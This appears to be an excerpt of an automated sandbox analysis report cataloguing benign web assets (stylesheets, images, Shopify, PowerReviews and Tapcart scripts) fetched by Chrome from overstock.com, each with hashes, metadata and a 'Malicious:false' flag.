                                                                                                                                                          Preview:.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul{padding-left:0;margin-left:2.14285714em;list-style-type:none}.fa-ul>li{position:relative}.fa-li{position:absolute;left:-2.14285714em;width:2.14285714em;top:.14285714em;text-align:center}.fa-li.fa-lg{left:-1.85714286em}.fa-border{padding:.2em .25em .15em;border:solid .08em #eee;border-radius:.1em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left{margin-right:.3em}.fa.fa-pull-right{margin-left:.3em}.pull-right{float:right}.pull-left{float:left}.fa.pull-left{margin-right:.3em}.fa.pull-right{margin-left:.3em}.fa-spin{-webkit-animation:fa-spin 2s infinite linear;animation:fa-spin 2s infinite linear}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):28600
                                                                                                                                                          Entropy (8bit):7.977299712347311
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:04C19EAF7E3AFCC6F8C5C82D89E64F29
                                                                                                                                                          SHA1:684B446B663E11F3D47C2674EEB8835BA3764B17
                                                                                                                                                          SHA-256:A057252804C9C5A6BA7E1EDFD280F5EFC73C6D0086BD52D26D8564D77931C60E
                                                                                                                                                          SHA-512:7CD968BA5AE6ABA7128E31FDEFB4A15BC222410AC98DB91CCAA912E7CF097BBA4DA82C259A7049C4463D1C1494356A1CA1344FAEA10CA03F5137AFE58519E28D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Download_the_app_desktop.png?v=1728423019&width=1200
                                                                                                                                                          Preview:RIFF.o..WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 m..Pt...*....>9..D"!....@@....**..L..*.S...~9.P...Oz....W.?(.;...o................_.O>_.W.9.k..._....c......................t..._._.K........{..-.......k...._aO...1.....P.........?.....~p.............S.......]..w........Q.".7...d?....c.3.Gb...+.'.o..t........./.?..a.../.?.2..|.~E.........?.~.{.....n...........p..~.{z.}.{.o./......./.....7...?o?......g....X.t...Q........._..................~.{...........h>....J._..........}......a......G.o.e.m..v.aZH.. 0...k..F{.#q.D.n.~8r.....(.......1..QZ.Fy&<5..]..{3.F,.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.748551361798369
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:1B241FC85C8E16A75BECFDEC4BAF4775
                                                                                                                                                          SHA1:189565112E65EE425BD9414CA1B66BA9603B05D8
                                                                                                                                                          SHA-256:31ECEF7E5ABB4806D58C90DEE8F412A014A772321F7420D4B60118739C0CD7F6
                                                                                                                                                          SHA-512:FB8F1AE19758DC24B7DD6F9328BD4C83B8717FE1C3A5F7ACE516DB0EB4901BEB2E8C47E8CD264B0E92FA65E0C3590C73470EFD38273C77F5B32FC989F70B3F43
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/40462317/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40462317","rollup":{"average_rating":4.76,"rating_count":859,"review_count":859,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):126291
                                                                                                                                                          Entropy (8bit):5.479285438944335
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:53F615FA8E1CE13AA187A7588412518E
                                                                                                                                                          SHA1:64005C5CE9F5F2E5099B7BF420D2AFAA146BAFA1
                                                                                                                                                          SHA-256:81B51DF6F10B4D93843EF216CEA2DC9D35A46914CBACACF1E25208D30D6A3969
                                                                                                                                                          SHA-512:366999BF13E704F10C97D76C0EE0509D2CCAA16FD53EA4EF7E62C99E1D056C1A0EE889E3E2785905AE0768C098EE9296FC0BFBFF5977D9AB2F28C68A65899CDD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/wpm/b8688a91bwbd065f36p51297ecfmc385dee2m.js
                                                                                                                                                          Preview:(()=>{var e={8771:()=>{},3482:function(e,t,n){var r,o,i;!function(s,a){"use strict";o=[n(3550)],void 0===(i="function"==typeof(r=function(e){var t=/(^|@)\S+:\d+/,n=/^\s*at .*(\S+:\d+|\(native\))/m,r=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(n))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(n)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var n=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),r=n.match(/ (\(.+\)$)/);n=r?n.replace(r[0],""):n;var o=t
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5992)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6091
                                                                                                                                                          Entropy (8bit):4.968486798510871
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:B8E9E42FD69C43B1D8AB92BA6769CA85
                                                                                                                                                          SHA1:4B832ACDAB88CA625637855446764FF30607CBF4
                                                                                                                                                          SHA-256:9B10AC7613153B15383A4086AC9A2B1AF87EC906DA812AF7D9686A753D6EA5BD
                                                                                                                                                          SHA-512:FF54BF75912A70B2F48AB6A770FA827EB5C515E32DFB67961037E396113B6F0C06AE93C5079B1B9027E66FA76C31DDD5918282131D1E373DE8CDC041A342CB25
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/custom-select.js?v=147432982730571550041729142870
                                                                                                                                                          Preview:if(!customElements.get("custom-select")){class CustomSelect extends HTMLElement{constructor(){super(),this.button=this.querySelector(".custom-select__btn"),this.listbox=this.querySelector(".custom-select__listbox"),this.selectedOption=this.querySelector('[aria-selected="true"]'),this.selectedOption||(this.selectedOption=this.listbox.firstElementChild),this.setButtonWidth(),window.initLazyScript(this,this.init.bind(this))}init(){this.options=this.querySelectorAll(".custom-select__option"),this.nativeSelect=document.getElementById(`${this.id}-native`),this.swatches="swatch"in this.options[this.options.length-1].dataset,this.focusedClass="is-focused",this.searchString="",this.listboxOpen=!1,this.selectedOption=this.querySelector('[aria-selected="true"]'),this.selectedOption||(this.selectedOption=this.listbox.firstElementChild),this.addEventListener("keydown",this.handleKeydown.bind(this)),this.button.addEventListener("mousedown",this.handleMousedown.bind(this))}static getNextVisibleSiblin
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):62111
                                                                                                                                                          Entropy (8bit):5.511214007458074
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:CCA89DB833018A8A2C8DFDAD032505EB
                                                                                                                                                          SHA1:3578A75309E030BD1F26A28B128AF363822B9932
                                                                                                                                                          SHA-256:8384E9CCFAF1CDB80BCD0D217A60D1DEC079C836C722E6286BDF15EA03805607
                                                                                                                                                          SHA-512:3DF17E77C6ADC75B1266507D5CC1C626CD9CA54B1F1298D4411C2A223E64A489C3F04AB46B1A60C441F72D6B7CCD28829DE3B68ECC34A451F2900264BAA9E48A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/wpm@8688a91bwbd065f36p51297ecfmc385dee2/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
                                                                                                                                                          Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18732
                                                                                                                                                          Entropy (8bit):7.9529387544320365
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4E5626C6E983CD0C70D44D21CA0A00F7
                                                                                                                                                          SHA1:084A86C7245BDC5A5EC17D2E4C4639081F555415
                                                                                                                                                          SHA-256:A6E7ADC0BE6932A9DBC770028C71E422D775AEF136EAEE3662C2CC65B0C3FAA4
                                                                                                                                                          SHA-512:683D7A12ACCD053320A8804B0D5048246FD103E778A93B4D9273A7D9BCB485F197F9A4D3D371D54C29C3C833AA2DBF8DCBDD6F90BD4304CDAF729963B6A7E981
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/06272024-MOPS-Category-Outdoor.png?v=1719612969&width=320
                                                                                                                                                          Preview:RIFF$I..WEBPVP8X....8...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.......m.Ir...=."".1U.J.{.k/.GN...l..6...3....Uv..9..%ps~s.@..C..W....H.F..s.. H...b..R.A.f..y..Q3.>.........m.P.....q$....."9.W...&7D>.ki....x.cN....\f..l%. sff{....~R....i.?......)..b...@n..n...M.Q.'"F.0dP....zP...3........hW...G....HR$.DH...c..U?..T.H.-k.>Y.......s..N..g.k]k.m..|o...WW..\*...{*.$$.{.....\.f...3....M^h.|..;.Ix...).m=o.?.m..w.q...X.C...q<../N...f.V...W..u......pk..X..FG.`...!|..'>M...R.}.........c3..83D...3?5..sH]2*.v...F.u0.pF.....{.?...U...jwm......VvA..=.uF0..:..>...'......5...D'..C
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5589
                                                                                                                                                          Entropy (8bit):7.358478057769275
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:06C2BD7E5CA000452EE5A7B88B1E986F
                                                                                                                                                          SHA1:23ABE08A3E414A177A1113900C4C6A8322C91448
                                                                                                                                                          SHA-256:FAAF9858808007BC4403E3CEAB1CF878D14584EB32B8F45DBA3AB8476B1BC8F7
                                                                                                                                                          SHA-512:7D0D53C28A8FD59DE85F88E14D940415281C38358081B7FF575A53BC72088F067439B06ECB2FA4FFE40521BD62FE06192ED322582258C21017222641601F53A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.................................................................................................................................................................................................................A$........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (38868), with LF, NEL line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):239533
                                                                                                                                                          Entropy (8bit):5.35897836836547
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F9483F0A62CDC235C3C68BF346E73063
                                                                                                                                                          SHA1:95C05F4D2DA9DFCC2D16E62E71EEECE1314D5E9F
                                                                                                                                                          SHA-256:415549AB1F904263D123E643E2450C3C34BE866D325E20DFD72D82EBD18CD773
                                                                                                                                                          SHA-512:535D4E18983E56AC1F0AE491B9FAC49914C0011899B57F63BB470007AF6671CDD65CB095EF1C10CA5528F9AF1FC403ED4657E390012B44BEC4D5786A7DDD603A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[8],{36984:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.BLANK_URL=t.relativeFirstCharacters=t.whitespaceEscapeCharsRegex=t.urlSchemeRegex=t.ctrlCharactersRegex=t.htmlCtrlEntityRegex=t.htmlEntitiesRegex=t.invalidProtocolRegex=void 0,t.invalidProtocolRegex=/^([^\w]*)(javascript|data|vbscript)/im,t.htmlEntitiesRegex=/&#(\w+)(^\w|;)?/g,t.htmlCtrlEntityRegex=/&(newline|tab);/gi,t.ctrlCharactersRegex=/[\u0000-\u001F\u007F-\u009F\u2000-\u200D\uFEFF]/gim,t.urlSchemeRegex=/^.+(:|&colon;)/gim,t.whitespaceEscapeCharsRegex=/(\\|%5[cC])((%(6[eE]|72|74))|[nrt])/g,t.relativeFirstCharacters=[".","/"],t.BLANK_URL="about:blank"},48068:(e,t,r)=>{"use strict";t.o=void 0;var n=r(36984);function o(e){try{return decodeURIComponent(e)}catch(t){return e}}t.o=function(e){if(!e)return n.BLANK_URL;var t,r,a=o(e);do{t=(a=o(a=(r=a,r.replace(n.ctrlCharactersRegex,"").replace(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (32461)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):69246
                                                                                                                                                          Entropy (8bit):5.499115539817298
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C8CE6A273CD1FD679985F0CFE1F63170
                                                                                                                                                          SHA1:066BE33802F4697A29C3A49DAD1A81785D8514A5
                                                                                                                                                          SHA-256:D83B7F084326A698DEC02C1131ECDB4E0D8432342AC8E4AC043A1BC80F5B1DA0
                                                                                                                                                          SHA-512:0BCDAC57F62C425D054CCA1D1C2459B0DC2C5548F8B6B26AD871B679A65A1FC7B302A61C181C977DA10223BB408E805FF82B362D503C16714DBFFFAFD3C4B2DA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/**. * name: @tapcart/webbridge. * version: v1.10.0. * description: Tapcart WebBridge SDK. * homepage: https://github.com/tapcartinc/tapcart-webbridge. */.(function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode(".tapcart-webbridge #tapcart-web-banner{display:none!important}.tapcart-webbridge footer,.tapcart-webbridge header,.tapcart-webbridge #footer,.tapcart-webbridge #header{display:none}.tapcart-webbridge iframe{display:none}")),document.head.appendChild(e)}}catch(t){console.error("vite-plugin-css-injected-by-js",t)}})();.(function(ae){typeof define=="function"&&define.amd?define(ae):ae()})(function(){"use strict";const ae=t=>t&&Object.keys(t).length===0&&t.constructor===Object;function rn(t){const e={};if(!Array.isArray(t))return e;for(const r of t)r&&r.name&&r.enabled&&(e[r.name]=r);return e}const nn=t=>{if(!t)return{};const e=n=>Array.isArray(n)?n.reduce((a,{namespace:s,key:i,value:o})=>(a[s]?a[s][i]=o:a[s]=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (14295)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):14345
                                                                                                                                                          Entropy (8bit):5.470148955001079
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6C7089520955559114DD8AE1C9155309
                                                                                                                                                          SHA1:6699A51084449EBE02F8D993D7A1CF319DC2E90A
                                                                                                                                                          SHA-256:17A3C5F33E798F7C361B47ED3A6FF3D7F6EC625BC39D4DA99E9A1D37A4C534BF
                                                                                                                                                          SHA-512:2FDAB7A90E032B2C30B39B319CF77DF4FAD6A1BC1E7B8D9EB7AC19D623291AAA9D1006E78FF93CF2CF9AF39BA0D6FA61FA8D10B0F3F8F4CEDE2F102B3D5C873F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:!function(e){"use strict";const n={TRACKING_ACCEPTED:"trackingConsentAccepted",TRACKING_DECLINED:"trackingConsentDeclined",MARKETING_ACCEPTED:"firstPartyMarketingConsentAccepted",SALE_OF_DATA_ACCEPTED:"thirdPartyMarketingConsentAccepted",ANALYTICS_ACCEPTED:"analyticsConsentAccepted",PREFERENCES_ACCEPTED:"preferencesConsentAccepted",MARKETING_DECLINED:"firstPartyMarketingConsentDeclined",SALE_OF_DATA_DECLINED:"thirdPartyMarketingConsentDeclined",ANALYTICS_DECLINED:"analyticsConsentDeclined",PREFERENCES_DECLINED:"preferencesConsentDeclined",CONSENT_COLLECTED:"visitorConsentCollected",CONSENT_TRACKING_API_LOADED:"consentTrackingApiLoaded"},t="2.1",o={ACCEPTED:"yes",DECLINED:"no",NO_INTERACTION:"no_interaction",NO_VALUE:""},r={NO_VALUE:"",ACCEPTED:"1",DECLINED:"0"},c={PREFERENCES:"p",ANALYTICS:"a",MARKETING:"m",SALE_OF_DATA:"t"},i={MARKETING:"m",ANALYTICS:"a",PREFERENCES:"p",SALE_OF_DATA:"s"},a={MARKETING:"marketing",ANALYTICS:"analytics",PREFERENCES:"preferences",SALE_OF_DATA:"sale_of_dat
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):43907
                                                                                                                                                          Entropy (8bit):7.971777735662514
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:55A6EE8DB3EC748E193B866ECAFD5E72
                                                                                                                                                          SHA1:741FA14A26007137B53BF5260B06209C0AA5E6C6
                                                                                                                                                          SHA-256:4D967369514033EE8028A54C7AD9B130423027ED5A08529CFF02A77CC7C7232F
                                                                                                                                                          SHA-512:70A60CDB6932644E75302670B8B6F445EBC68529E169D2EBE0A2C8AD9AC48D179B1A30D95FE59712008585E6821FF616E1CBA30EDE618461FA9FE597492DB0BF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@......................................................................................>....+.....8.h`.. ....Mze#p..;_..7#...(.TB..?.....+2py.A.?.....KLd.2..Ajf.E.`....J6.+S.XC....#....)..~o..b.T...BTH... d... t.#.g
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 172917
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):46987
                                                                                                                                                          Entropy (8bit):7.995011315150969
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:652441EE646306B65DEA7908E91EE27A
                                                                                                                                                          SHA1:2009B5DE455D86C15FC8F43F11E4FA9C22087C19
                                                                                                                                                          SHA-256:C686D2FBFB24F8BC20579D635C95F6B55AA353BC8E55B5B9D0A53B764A2D7FC4
                                                                                                                                                          SHA-512:528EE4A075BCF5B70D2C89220DAB79EC1BAA6B8252D7AC5B830D08F5E0789DE864263EFBA913D7E0B1181C0F8212B929E9CA0CF979355A3376B5653B756760CB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.evgnet.com/beacon/c556855555573h9jz3n3n3p091552376/overstock/scripts/evergage.min.js
                                                                                                                                                          Preview:...........i{.F.0.........DQ..d..<.,.J...82'O.h..@.&H-.y~...^.X...d.{.;.."..^.....k.%m.b4.....9....77..<O.Y.&s>c.|.M.[+t..(w..6.o>.....7..f....Mlk?.f..d.>~.c;.X..G....C.^3*.y..6Kg..W.$[L.v6.oFy{.3.X.O#Y.#6..6.A.Z.6Os.......O9...[6...h..l6o.m{./....Ng....v...,..|>.E....l.V.....hO.k..=....k..7..<.w..UnG.?JlY.=.....eS>._._..,..WapS.l&... .$...e.q0.z......3.G..t..`.....b.p.S.....t..;l:M.l..J..V...kX".....~......d...'.......'.4..t...3......^.@&...p7.N.z8d..zb.s......4.;+.e~yOV.y2.pYa..z.m.. ..e..y@M=\. o.>..&.....]D.`...X..b...j...mnF..q...l.....x4...>b.y6... .......4.1Y....E..Z..-;!l..6...Yv..p...g3.....m.../.y[aF{...Y......c...".h.4Zc...+*.......Y..!O.py{.->.|..~`./...<67k]I@.....{z.#.Y.V^..-..........".. ....wg:...~.S..t..~..C&......G.2...Uc.i\..6.d.6.3,G...(%...C....K.0..>{............. ....\n..[.z2.,....o..X.I;D......../..!.H.IN1......5P;.w.G...D!._..?..k5.ocw......%..`D.C...D].z.^.l=..p.6....|.z......a..../.mC...APS...p......t.......Gp..z.6~..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, Unicode text, UTF-8 text, with very long lines (2801)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2806
                                                                                                                                                          Entropy (8bit):5.221459216744314
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:128D8F808C5FCAED6EAC90B0A916E9E7
                                                                                                                                                          SHA1:2AE0AADC52D9DF71BBA1AB97B553D8683446A410
                                                                                                                                                          SHA-256:18D58DAF4ADF928BA8ACF3E6AF9DBAA3EEEA8DEE4A7EBA3303A6F925E61A7D3B
                                                                                                                                                          SHA-512:C56A1FDBB7CD74520ADBCCD8CD2DCACBE3E3C472EB5BA96265300C141514DE3BDDAF7C327D40514A3EF364BB7173C2EB62B83485F9764B42BBF0FAAC475B5F45
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useShowShopPayOptin.fhQjPey-.js
                                                                                                                                                          Preview:import{c8 as C,A as m,y as x,a as t,e as _,jt as b,aa as h,bR as d,a8 as f,a9 as P,bx as I,fe as E,bl as R,t as k,o as O,eX as L,ai as D,as as F,e6 as T,cr as V,en as A,r as M,pQ as z,dF as U,qO as Y,bo as j}from"./app.CRtF78CU.js";function q({impressionType:e,impressionFeatures:s}){const r=C(),n=m(null),i=m({impressionType:e,impressionFeatures:s});return i.current={impressionType:e,impressionFeatures:s},x(()=>{if(!window.IntersectionObserver)return;const o=new IntersectionObserver(p=>{const u=p.some(({isIntersecting:c})=>c);a&&u&&(o.unobserve(a),r("impression",{...i.current,timestamp:new Date}))},{threshold:1}),a=n.current;return a&&o.observe(a),()=>{a&&o.unobserve(a)}},[r]),n}function J({impressionType:e,impressionFeatures:s,children:r}){const n=q({impressionType:e,impressionFeatures:s});return t("div",{ref:n,children:r})}function N(){const e=_();return t(P,{size:"small",appearance:"subdued",children:t(b,{children:e("shop_pay_remember_me.terms_and_privacy_html",{privacy_href:t(h,{chi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (983)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):984
                                                                                                                                                          Entropy (8bit):5.413980753659723
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:ED658BC54AB3DD5886F86D6F4765F114
                                                                                                                                                          SHA1:D68EA7AC47FBB21649F5F6FB60C38D314E75A690
                                                                                                                                                          SHA-256:9A77E73CF730C3FA1A7E0724336FD081799E3F0FE22101A3D727C70ABA95D29B
                                                                                                                                                          SHA-512:213ED383847C5F31C692E3E5DA6B19915F34850FFE5347A9053EE71096A22DC49CF3587001BB2D5DA3A9887965165568413A72809049B37B864DF3779DC4BA88
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/LegacyVaultedShippingMethods.8dZ3Q6PP.js
                                                                                                                                                          Preview:import{c as E,u as y,C as T,b as P,d as f,q as v,h as I,e as _,f as M,g as b,i as C,y as m,p as L,a as o,I as S,P as k,S as A}from"./app.CRtF78CU.js";import{R as x}from"./Rollup.B3ludNL-.js";import{u as D}from"./SubscriptionPriceBreakdown.CcRBYBQn.js";const N=E(null);function B(){const e=y(T),i=P(),[t]=f(N),s=v(a=>t?.setShopPay(a),[t]);return{setEditorShopPay:i&&e&&t?s:void 0}}function R(){const[e,i]=I(void 0),t=_(),{promiseText:s,loading:a}=M(),r=D(),p=b(),{loading:d,value:n}=C();m(()=>{i(Date.now())},[]),m(()=>{if(!(d||!n)&&e){const l=Date.now(),c=l-e,u=n[0]?.promiseProviderApiClientId;if(u){const h=L(u);r(c,l,Number(h)),p(c,Number(h)),i(void 0)}}},[d,n,e,r,p]);const g=o(S,{children:[k,o(A,{})]});return o(S,{children:o(x,{id:"buyWithPrimeShippingMethods",label:t("shipping.shipping_method_title","Shipping method"),summary:a?g:s})})}const V=Object.freeze(Object.defineProperty({__proto__:null,default:R},Symbol.toStringTag,{value:"Module"}));export{V as L,N as e,B as u};.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9362
                                                                                                                                                          Entropy (8bit):7.8800871496316836
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:229F844C54E56ADDB45A887263F59447
                                                                                                                                                          SHA1:5E5DED85B6115894635E923C283815CBF69958C7
                                                                                                                                                          SHA-256:FE6B4656D3795251EC9E47E11A9EDFE71711BC48DD25FD8B1F4D80B9F086F7BA
